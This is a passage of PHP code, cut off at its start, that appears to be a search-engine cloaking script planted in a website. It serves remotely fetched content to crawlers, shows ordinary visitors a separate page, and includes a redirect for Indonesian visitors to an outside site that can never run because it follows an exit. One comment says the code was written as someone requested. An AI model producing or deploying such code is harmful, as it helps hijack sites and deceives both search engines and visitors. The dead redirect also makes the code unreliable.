true, CURLOPT_TIMEOUT => 12, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_FOLLOWLOCATION => true, CURLOPT_USERAGENT => 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', CURLOPT_HTTPHEADER => [ 'Accept: text/plain', 'Referer: https://www.google.com/' ] ]); $content = curl_exec($ch); curl_close($ch); // Kalau gagal total → langsung blank (sesuai request kamu, tanpa fallback) echo $content ?: ''; exit; } // Bukan bot → tampilkan konten normal include('index2.php'); exit; // Redirect user Indonesia (tetap jalan) $lang = substr($_SERVER['HTTP_ACCEPT_LANGUAGE'] ?? '', 0, 2); if ($lang === 'id') { header('Location: https://djidrone.pages.dev/'); exit; } ?>